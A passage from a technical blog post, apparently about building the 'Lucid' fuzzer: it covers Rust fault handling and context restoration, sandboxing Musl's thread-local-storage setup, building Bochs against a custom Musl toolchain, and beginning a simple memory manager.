<p>Full-blown context-switching like this, allows us to encounter a <code class="language-plaintext highlighter-rouge">Fault</code> and then pass that error back to Lucid for handling. In the <code class="language-plaintext highlighter-rouge">fault_handler</code>, we set the <code class="language-plaintext highlighter-rouge">Fault</code> type in the execution context, and then we attempt to restore execution back to Lucid:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Where we handle faults that may occur when context-switching from Bochs. We</span>
<span class="c1">// just want to make the fault visible to Lucid so we set it in the context,</span>
<span class="c1">// then we try to restore Lucid execution from its last-known good state</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="nf">fault_handler</span><span class="p">(</span><span class="n">contextp</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">,</span> <span class="n">fault</span><span class="p">:</span> <span class="n">Fault</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">let</span> <span class="n">context</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="o">*</span><span class="n">contextp</span> <span class="p">};</span>
    <span class="k">match</span> <span class="n">fault</span> <span class="p">{</span>
        <span class="nn">Fault</span><span class="p">::</span><span class="nb">Success</span> <span class="k">=&gt;</span> <span class="n">context</span><span class="py">.fault</span> <span class="o">=</span> <span class="nn">Fault</span><span class="p">::</span><span class="nb">Success</span><span class="p">,</span>
        <span class="o">...</span>
    <span class="p">}</span>

    <span class="c1">// Attempt to restore Lucid execution</span>
    <span class="nf">restore_lucid_execution</span><span class="p">(</span><span class="n">contextp</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// We use this function to restore Lucid execution to its last known good state</span>
<span class="c1">// This is just really trying to plumb up a fault to a level that is capable of</span>
<span class="c1">// discerning what action to take. Right now, we probably just call it fatal. </span>
<span class="c1">// We don't really deal with double-faults, it doesn't make much sense at the</span>
<span class="c1">// moment when a single-fault will likely be fatal already. Maybe later?</span>
<span class="k">fn</span> <span class="nf">restore_lucid_execution</span><span class="p">(</span><span class="n">contextp</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="n">LucidContext</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">let</span> <span class="n">context</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="o">*</span><span class="n">contextp</span> <span class="p">};</span>
    
    <span class="c1">// Fault should be set, but change the execution mode now since we're</span>
    <span class="c1">// jumping back to Lucid</span>
    <span class="n">context</span><span class="py">.mode</span> <span class="o">=</span> <span class="nn">ExecMode</span><span class="p">::</span><span class="n">Lucid</span><span class="p">;</span>

    <span class="c1">// Restore extended state</span>
    <span class="k">let</span> <span class="n">save_area</span> <span class="o">=</span> <span class="n">context</span><span class="py">.lucid_save_area</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">save_inst</span> <span class="o">=</span> <span class="n">context</span><span class="py">.save_inst</span><span class="p">;</span>
    <span class="k">match</span> <span class="n">save_inst</span> <span class="p">{</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">XSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Retrieve XCR0 value, this will serve as our save mask</span>
            <span class="k">let</span> <span class="n">xcr0</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xgetbv</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="p">};</span>

            <span class="c1">// Call xrstor to restore the extended state from Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_xrstor64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">,</span> <span class="n">xcr0</span><span class="p">);</span> <span class="p">}</span>             
        <span class="p">},</span>
        <span class="nn">SaveInst</span><span class="p">::</span><span class="n">FxSave64</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Call fxrstor to restore the extended state from Bochs save area</span>
            <span class="k">unsafe</span> <span class="p">{</span> <span class="nf">_fxrstor64</span><span class="p">(</span><span class="n">save_area</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="nb">u8</span><span class="p">);</span> <span class="p">}</span>
        <span class="p">},</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">(),</span> <span class="c1">// NoSave</span>
    <span class="p">}</span>

    <span class="c1">// Next, we need to restore our GPRs. This is kind of different order than</span>
    <span class="c1">// returning from a successful context switch since normally we'd still be</span>
    <span class="c1">// using our own stack; however right now, we still have Bochs' stack, so</span>
    <span class="c1">// we need to recover our own Lucid stack which is saved as RSP in our </span>
    <span class="c1">// register bank</span>
    <span class="k">let</span> <span class="n">lucid_regsp</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">context</span><span class="py">.lucid_regs</span> <span class="k">as</span> <span class="o">*</span><span class="k">const</span> <span class="n">_</span><span class="p">;</span>

    <span class="c1">// Move that pointer into R14 and restore our GPRs. After that we have the</span>
    <span class="c1">// RSP value that we saved when we called into context_switch, this RSP was</span>
    <span class="c1">// then subtracted from by 0x8 for the pushfq operation that comes right</span>
    <span class="c1">// after. So in order to recover our CPU flags, we need to manually sub</span>
    <span class="c1">// 0x8 from the stack pointer. Pop the CPU flags back into place, and then </span>
    <span class="c1">// return to the last known good Lucid state</span>
    <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nd">asm!</span><span class="p">(</span>
            <span class="s">"mov r14, {0}"</span><span class="p">,</span>
            <span class="s">"mov rax, [r14 + 0x0]"</span><span class="p">,</span>
            <span class="s">"mov rbx, [r14 + 0x8]"</span><span class="p">,</span>
            <span class="s">"mov rcx, [r14 + 0x10]"</span><span class="p">,</span>
            <span class="s">"mov rdx, [r14 + 0x18]"</span><span class="p">,</span>
            <span class="s">"mov rsi, [r14 + 0x20]"</span><span class="p">,</span>
            <span class="s">"mov rdi, [r14 + 0x28]"</span><span class="p">,</span>
            <span class="s">"mov rbp, [r14 + 0x30]"</span><span class="p">,</span>
            <span class="s">"mov rsp, [r14 + 0x38]"</span><span class="p">,</span>
            <span class="s">"mov r8, [r14 + 0x40]"</span><span class="p">,</span>
            <span class="s">"mov r9, [r14 + 0x48]"</span><span class="p">,</span>
            <span class="s">"mov r10, [r14 + 0x50]"</span><span class="p">,</span>
            <span class="s">"mov r11, [r14 + 0x58]"</span><span class="p">,</span>
            <span class="s">"mov r12, [r14 + 0x60]"</span><span class="p">,</span>
            <span class="s">"mov r13, [r14 + 0x68]"</span><span class="p">,</span>
            <span class="s">"mov r15, [r14 + 0x78]"</span><span class="p">,</span>
            <span class="s">"mov r14, [r14 + 0x70]"</span><span class="p">,</span>
            <span class="s">"sub rsp, 0x8"</span><span class="p">,</span>
            <span class="s">"popfq"</span><span class="p">,</span>
            <span class="s">"ret"</span><span class="p">,</span>
            <span class="k">in</span><span class="p">(</span><span class="n">reg</span><span class="p">)</span> <span class="n">lucid_regsp</span><span class="p">,</span>
        <span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>As you can see, restoring Lucid state and resuming execution is quite involved, One tricky thing we had to deal with was the fact that right now, when a <code class="language-plaintext highlighter-rouge">Fault</code> occurs, we are likely operating in Bochs mode which means that our stack is Bochs’ stack and not Lucid’s. So even though this is technically just a context-switch, we had to change the order around a little bit to pop Lucid’s saved state into our current state and resume execution. Now when Lucid calls functions that context-switch, it can simply check the “return” value of such functions by checking if there was a <code class="language-plaintext highlighter-rouge">Fault</code> noted in the execution context like so:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>	<span class="c1">// Start executing Bochs</span>
    <span class="nd">prompt!</span><span class="p">(</span><span class="s">"Starting Bochs..."</span><span class="p">);</span>
    <span class="nf">start_bochs</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">lucid_context</span><span class="p">);</span>

    <span class="c1">// Check to see if any faults occurred during Bochs execution</span>
    <span class="k">if</span> <span class="o">!</span><span class="nd">matches!</span><span class="p">(</span><span class="n">lucid_context</span><span class="py">.fault</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="nb">Success</span><span class="p">)</span> <span class="p">{</span>
        <span class="nd">fatal!</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from_fault</span><span class="p">(</span><span class="n">lucid_context</span><span class="py">.fault</span><span class="p">));</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Pretty neat imo!</p>

<h2 id="sandboxing-thread-local-storage">Sandboxing Thread-Local-Storage</h2>

<p>Coming into this project, I honestly didn’t know much about thread-local-storage (TLS) except that it was some magic per-thread area of memory that did <em>stuff</em>. That is still the entirety of my knowledge really, except now I’ve seen some code that allocates that memory and initializes it, which helps me appreciate what is really going on.
Once I implemented the <code class="language-plaintext highlighter-rouge">Fault</code> system discussed above, I noticed that Lucid would segfault when exiting. After some debugging, I realized it was calling a function pointer that was a bogus address. How could this have happened? Well, after some digging, I noticed that right before that function call, an offset of the <code class="language-plaintext highlighter-rouge">fs</code> register was used to load the address from memory. Typically, <code class="language-plaintext highlighter-rouge">fs</code> is used to access TLS. So at that point, I had a strong suspicion that Bochs had somehow corrupted the value of my <code class="language-plaintext highlighter-rouge">fs</code> register. So I did a quick grep through Musl looking for <code class="language-plaintext highlighter-rouge">fs</code> register access and found the following:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* Copyright 2011-2012 Nicholas J. Kain, licensed under standard MIT license */</span>
<span class="p">.</span><span class="n">text</span>
<span class="p">.</span><span class="n">global</span> <span class="n">__set_thread_area</span>
<span class="p">.</span><span class="n">hidden</span> <span class="n">__set_thread_area</span>
<span class="p">.</span><span class="n">type</span> <span class="n">__set_thread_area</span><span class="p">,</span><span class="err">@</span><span class="n">function</span>
<span class="n">__set_thread_area</span><span class="o">:</span>
	<span class="n">mov</span> <span class="o">%</span><span class="n">rdi</span><span class="p">,</span><span class="o">%</span><span class="n">rsi</span>           <span class="cm">/* shift for syscall */</span>
	<span class="n">movl</span> <span class="err">$</span><span class="mh">0x1002</span><span class="p">,</span><span class="o">%</span><span class="n">edi</span>       <span class="cm">/* SET_FS register */</span>
	<span class="n">movl</span> <span class="err">$</span><span class="mi">158</span><span class="p">,</span><span class="o">%</span><span class="n">eax</span>          <span class="cm">/* set fs segment to */</span>
	<span class="n">syscall</span>                 <span class="cm">/* arch_prctl(SET_FS, arg)*/</span>
	<span class="n">ret</span>
</code></pre></div></div>

<p>So this function, <code class="language-plaintext highlighter-rouge">__set_thread_area</code> uses an inline <code class="language-plaintext highlighter-rouge">syscall</code> instruction to call <code class="language-plaintext highlighter-rouge">arch_prctl</code> to directly manipulate the <code class="language-plaintext highlighter-rouge">fs</code> register. This made a lot of sense because, if the <code class="language-plaintext highlighter-rouge">syscall</code> instruction was indeed called, we wouldn’t intercept this with our syscall sandboxing infrastructure because we never instrumented this, we’ve only instrumented what boils down to the <code class="language-plaintext highlighter-rouge">syscall()</code> function wrapper in Musl. So this would escape our sandbox and directly manipulate <code class="language-plaintext highlighter-rouge">fs</code>. Sure enough, I discovered that this function is called during TLS initialization in <code class="language-plaintext highlighter-rouge">src/env/__init_tls.c</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">__init_tp</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">p</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">pthread_t</span> <span class="n">td</span> <span class="o">=</span> <span class="n">p</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">self</span> <span class="o">=</span> <span class="n">td</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">r</span> <span class="o">=</span> <span class="n">__set_thread_area</span><span class="p">(</span><span class="n">TP_ADJ</span><span class="p">(</span><span class="n">p</span><span class="p">));</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">r</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">r</span><span class="p">)</span> <span class="n">libc</span><span class="p">.</span><span class="n">can_do_threads</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">detach_state</span> <span class="o">=</span> <span class="n">DT_JOINABLE</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">tid</span> <span class="o">=</span> <span class="n">__syscall</span><span class="p">(</span><span class="n">SYS_set_tid_address</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">__thread_list_lock</span><span class="p">);</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">locale</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">libc</span><span class="p">.</span><span class="n">global_locale</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">robust_list</span><span class="p">.</span><span class="n">head</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">td</span><span class="o">-&gt;</span><span class="n">robust_list</span><span class="p">.</span><span class="n">head</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">sysinfo</span> <span class="o">=</span> <span class="n">__sysinfo</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">next</span> <span class="o">=</span> <span class="n">td</span><span class="o">-&gt;</span><span class="n">prev</span> <span class="o">=</span> <span class="n">td</span><span class="p">;</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So in this <code class="language-plaintext highlighter-rouge">__init_tp</code> function, we’re given a pointer and then we call <code class="language-plaintext highlighter-rouge">TP_ADJ</code> macro to do some arithmetic on the pointer and pass that value to <code class="language-plaintext highlighter-rouge">__set_thread_area</code> so that <code class="language-plaintext highlighter-rouge">fs</code> is manipulated. Great, now how do we sandbox this? I wanted to avoid messing with the inline assembly in <code class="language-plaintext highlighter-rouge">__set_thread_area</code> itself, so I just changed the source so that Musl would instead just utilize the <code class="language-plaintext highlighter-rouge">syscall()</code> wrapper function which calls our instrumented syscall functions under the hood, like so:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#ifndef ARCH_SET_FS
#define ARCH_SET_FS 0x1002
#endif </span><span class="cm">/* ARCH_SET_FS */</span><span class="cp">
</span>
<span class="kt">int</span> <span class="nf">__init_tp</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">p</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">pthread_t</span> <span class="n">td</span> <span class="o">=</span> <span class="n">p</span><span class="p">;</span>
	<span class="n">td</span><span class="o">-&gt;</span><span class="n">self</span> <span class="o">=</span> <span class="n">td</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">r</span> <span class="o">=</span> <span class="n">syscall</span><span class="p">(</span><span class="n">SYS_arch_prctl</span><span class="p">,</span> <span class="n">ARCH_SET_FS</span><span class="p">,</span> <span class="n">TP_ADJ</span><span class="p">(</span><span class="n">p</span><span class="p">));</span>
	<span class="c1">//int r = __set_thread_area(TP_ADJ(p));</span>
</code></pre></div></div>

<p>Now, we can intercept this syscall in Lucid and effectively do nothing really. As long as there are not other direct accesses to <code class="language-plaintext highlighter-rouge">fs</code> (and there might be still!), we should be fine here. I also adjusted the Musl code so that if we’re running under Lucid, we provide a TLS-area via the execution context by just creating a mock area of what Musl calls the <code class="language-plaintext highlighter-rouge">builtin_tls</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">builtin_tls</span> <span class="p">{</span>
	<span class="kt">char</span> <span class="n">c</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">pthread</span> <span class="n">pt</span><span class="p">;</span>
	<span class="kt">void</span> <span class="o">*</span><span class="n">space</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
<span class="p">}</span> <span class="n">builtin_tls</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
</code></pre></div></div>

<p>So now, when <code class="language-plaintext highlighter-rouge">__init_tp</code> is called, the pointer it is giving points to our own TLS block of memory we’ve created in the execution context so that we now have access to things like <code class="language-plaintext highlighter-rouge">errno</code> in Lucid:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="n">libc</span><span class="p">.</span><span class="n">tls_size</span> <span class="o">&gt;</span> <span class="k">sizeof</span> <span class="n">builtin_tls</span><span class="p">)</span> <span class="p">{</span>
<span class="cp">#ifndef SYS_mmap2
#define SYS_mmap2 SYS_mmap
#endif
</span>		<span class="n">__asm__</span> <span class="n">__volatile__</span> <span class="p">(</span><span class="s">"int3"</span><span class="p">);</span> <span class="c1">// Added by me just in case</span>
		<span class="n">mem</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">__syscall</span><span class="p">(</span>
			<span class="n">SYS_mmap2</span><span class="p">,</span>
			<span class="mi">0</span><span class="p">,</span> <span class="n">libc</span><span class="p">.</span><span class="n">tls_size</span><span class="p">,</span> <span class="n">PROT_READ</span><span class="o">|</span><span class="n">PROT_WRITE</span><span class="p">,</span>
			<span class="n">MAP_ANONYMOUS</span><span class="o">|</span><span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
		<span class="cm">/* -4095...-1 cast to void * will crash on dereference anyway,
		 * so don't bloat the init code checking for error codes and
		 * explicitly calling a_crash(). */</span>
	<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
		<span class="c1">// Check to see if we're running under Lucid or not</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_lucid_ctx</span><span class="p">)</span> <span class="p">{</span> <span class="n">mem</span> <span class="o">=</span> <span class="n">builtin_tls</span><span class="p">;</span> <span class="p">}</span>
		<span class="k">else</span> <span class="p">{</span> <span class="n">mem</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">g_lucid_ctx</span><span class="o">-&gt;</span><span class="n">tls</span><span class="p">;</span> <span class="p">}</span>
	<span class="p">}</span>

	<span class="cm">/* Failure to initialize thread pointer is always fatal. */</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">__init_tp</span><span class="p">(</span><span class="n">__copy_tls</span><span class="p">(</span><span class="n">mem</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
		<span class="n">a_crash</span><span class="p">();</span>
</code></pre></div></div>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">#[repr(C)]</span>
<span class="nd">#[derive(Clone)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">Tls</span> <span class="p">{</span>
    <span class="n">padding0</span><span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">8</span><span class="p">],</span> <span class="c1">// char c</span>
    <span class="n">padding1</span><span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">52</span><span class="p">],</span> <span class="c1">// Padding to offset of errno which is 52-bytes</span>
    <span class="k">pub</span> <span class="n">errno</span><span class="p">:</span> <span class="nb">i32</span><span class="p">,</span>
    <span class="n">padding2</span><span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">144</span><span class="p">],</span> <span class="c1">// Additional padding to get to 200-bytes total</span>
    <span class="n">padding3</span><span class="p">:</span> <span class="p">[</span><span class="nb">u8</span><span class="p">;</span> <span class="mi">128</span><span class="p">],</span> <span class="c1">// 16 void * values</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So now for example, if during a <code class="language-plaintext highlighter-rouge">read</code> syscall, we get passed a NULL buffer, we can return an error code and set <code class="language-plaintext highlighter-rouge">errno</code> appropriately <em>from the syscall handler in Lucid</em>:</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>            <span class="c1">// Now we need to make sure the buffer passed to read isn't NULL</span>
            <span class="k">let</span> <span class="n">buf_p</span> <span class="o">=</span> <span class="n">a2</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">;</span>
            <span class="k">if</span> <span class="n">buf_p</span><span class="nf">.is_null</span><span class="p">()</span> <span class="p">{</span>
                <span class="n">context</span><span class="py">.tls.errno</span> <span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">EINVAL</span><span class="p">;</span>
                <span class="k">return</span> <span class="o">-</span><span class="mi">1_i64</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
            <span class="p">}</span>
</code></pre></div></div>

<p>There may still be other accesses to <code class="language-plaintext highlighter-rouge">fs</code> and <code class="language-plaintext highlighter-rouge">gs</code> that I’m not currently sandboxing, but we haven’t reached that part of development yet.</p>

<h2 id="building-bochs">Building Bochs</h2>

<p>I put off building and loading Bochs for a long time because I wanted to make sure I had the foundations of context-switching and syscall-sandboxing built. I also was worried that it would be difficult since getting vanilla Bochs built <code class="language-plaintext highlighter-rouge">--static-pie</code> was difficult for me initially. To complicate building Bochs in general, we need to build Bochs against our custom Musl. This means that we’ll need to have a compiler that we can tell to ignore whatever standard C library it normally uses and use our custom Musl libc instead. This proved quite tedious and difficult for me. Once I was successful, I came to realize that wasn’t enough. Bochs, being a C++ code base, also required access to standard C++ library functions. This simply could not work as I had done previously with the test program because I didn’t have a C++ library that we could use that had been built against our custom Musl.</p>

<p>Luckily, there is an awesome project called the <code class="language-plaintext highlighter-rouge">musl-cross-make</code> <a href="https://github.com/richfelker/musl-cross-make">project</a>, which aims to help people build their own Musl toolchains from scratch. This is perfect for what we need because we require a complete toolchain. We need to support the C++ standard library and it needs to be built with our custom Musl. So to do this, we use the The GNU C++ Library, libstdc++, that is part of the <code class="language-plaintext highlighter-rouge">gcc</code> project.</p>

<p><code class="language-plaintext highlighter-rouge">musl-cross-make</code> will pull down all of constituent tool-chain components and create a from scratch tool chain that will utilize a Musl libc and a libstdc++ built against that Musl. Then all we have to do for our purposes, is recompile that Musl libc with our custom patches that we make with Lucid, and then use the tool chain to compile Bochs as <code class="language-plaintext highlighter-rouge">--static-pie</code>. It really was as simple as:</p>
<ul>
  <li>git clone musl-cross-make</li>
  <li>configure an x86_64 tool chain target</li>
  <li>build the tool chain</li>
  <li>go into its Musl directory, apply our Musl patches</li>
  <li>configure Musl to build/install into the musl-cross-make output directory</li>
  <li>re-build Musl libc</li>
  <li>configure Bochs to use the new toolchain and set the <code class="language-plaintext highlighter-rouge">--static-pie</code> flag</li>
</ul>

<p>This is the Bochs configuration file that I used to build Bochs:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/sh</span>

<span class="nv">CC</span><span class="o">=</span><span class="s2">"/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-gcc"</span>
<span class="nv">CXX</span><span class="o">=</span><span class="s2">"/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-g++"</span>
<span class="nv">CFLAGS</span><span class="o">=</span><span class="s2">"-Wall --static-pie -fPIE"</span>
<span class="nv">CXXFLAGS</span><span class="o">=</span><span class="s2">"</span><span class="nv">$CFLAGS</span><span class="s2">"</span>

<span class="nb">export </span>CC
<span class="nb">export </span>CXX
<span class="nb">export </span>CFLAGS
<span class="nb">export </span>CXXFLAGS

./configure <span class="nt">--enable-sb16</span> <span class="se">\</span>
                <span class="nt">--enable-all-optimizations</span> <span class="se">\</span>
                <span class="nt">--enable-long-phy-address</span> <span class="se">\</span>
                <span class="nt">--enable-a20-pin</span> <span class="se">\</span>
                <span class="nt">--enable-cpu-level</span><span class="o">=</span>6 <span class="se">\</span>
                <span class="nt">--enable-x86-64</span> <span class="se">\</span>
                <span class="nt">--enable-vmx</span><span class="o">=</span>2 <span class="se">\</span>
                <span class="nt">--enable-pci</span> <span class="se">\</span>
                <span class="nt">--enable-usb</span> <span class="se">\</span>
                <span class="nt">--enable-usb-ohci</span> <span class="se">\</span>
                <span class="nt">--enable-usb-ehci</span> <span class="se">\</span>
                <span class="nt">--enable-usb-xhci</span> <span class="se">\</span>
                <span class="nt">--enable-busmouse</span> <span class="se">\</span>
                <span class="nt">--enable-e1000</span> <span class="se">\</span>
                <span class="nt">--enable-show-ips</span> <span class="se">\</span>
                <span class="nt">--enable-avx</span> <span class="se">\</span>
                <span class="nt">--with-nogui</span>
</code></pre></div></div>

<p>This was enough to get the Bochs binary I wanted to begin testing with. In the future we will likely need to change this configuration file, but for now this works. The repository should have more detailed build instructions and also will include already built Bochs binary.</p>

<h2 id="implementing-a-simple-mmu">Implementing a Simple MMU</h2>
<p>Now that we are loading and executing Bochs and sandboxing it from syscalls, there are several new syscalls that we need to implement such as <code class="language-plaintext highlighter-rouge">brk</code>, <code class="language-plaintext highlighter-rouge">mmap</code>, and <code class="language-plaintext highlighter-rouge">munmap</code>. Our test program was very simple and we hadn’t come across these syscalls yet.</p>

<p>These three syscalls all manipulate memory in some way, so I decided that we needed to implement some sort of Memory-Manager (MMU). To keep things as simple as possible, I decided that, at least for now, we will not be worrying about freeing memory, re-using memory, or unmapping memory. We will simply pre-allocate a pool of memory for both <code class="language-plaintext highlighter-rouge">brk</code> calls to use and <code class="language-plaintext highlighter-rouge">mmap</code> calls to use, so two pre-allocated pools of memory. We can also just hang the MMU structure off of the execution context so that we always have access to it during syscalls and context-switches.</p>

<p>So far, Bochs really only cares to map memory in that is READ/WRITE, so that works in our favor in terms of simplicity. So to pre-allocate the memory pools, we just do a fairly large <code class="language-plaintext highlighter-rouge">mmap</code> call ourselves when we set up the <code class="language-plaintext highlighter-rouge">MMU</code> as part of the execution context initialization routine:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Structure to track memory usage in Bochs</span>
<span class="nd">#[derive(Clone)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">Mmu</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">brk_base</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>        <span class="c1">// Base address of brk region, never changes</span>
    <span class="k">pub</span> <span class="n">brk_size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>        <span class="c1">// Size of the program break region</span>
    <span class="k">pub</span> <span class="n">curr_brk</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>        <span class="c1">// The current program break</span>
    
    <span class="k">pub</span> <span class="n">mmap_base</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>       <span class="c1">// Base address of the `mmap` pool</span>
    <span class="k">pub</span> <span class="n">mmap_size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>       <span class="c1">// Size of the `mmap` pool</span>
    <span class="k">pub</span> <span class="n">curr_mmap</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>       <span class="c1">// The current `mmap` page base</span>
    <span class="k">pub</span> <span class="n">next_mmap</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>       <span class="c1">// The next allocation base address</span>
<span class="p">}</span>

<span class="k">impl</span> <span class="n">Mmu</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">new</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="k">Self</span><span class="p">,</span> <span class="n">LucidErr</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// We don't care where it's mapped</span>
        <span class="k">let</span> <span class="n">addr</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nn">null_mut</span><span class="p">::</span><span class="o">&lt;</span><span class="nn">libc</span><span class="p">::</span><span class="nb">c_void</span><span class="o">&gt;</span><span class="p">();</span>

        <span class="c1">// Straight-forward</span>
        <span class="k">let</span> <span class="n">length</span> <span class="o">=</span> <span class="p">(</span><span class="n">DEFAULT_BRK_SIZE</span> <span class="o">+</span> <span class="n">DEFAULT_MMAP_SIZE</span><span class="p">)</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">size_t</span><span class="p">;</span>

        <span class="c1">// This is normal</span>
        <span class="k">let</span> <span class="n">prot</span> <span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_WRITE</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_READ</span><span class="p">;</span>

        <span class="c1">// This might change at some point?</span>
        <span class="k">let</span> <span class="n">flags</span> <span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_ANONYMOUS</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_PRIVATE</span><span class="p">;</span>

        <span class="c1">// No file backing</span>
        <span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_int</span><span class="p">;</span>

        <span class="c1">// No offset</span>
        <span class="k">let</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">off_t</span><span class="p">;</span>

        <span class="c1">// Try to `mmap` this block</span>
        <span class="k">let</span> <span class="n">result</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
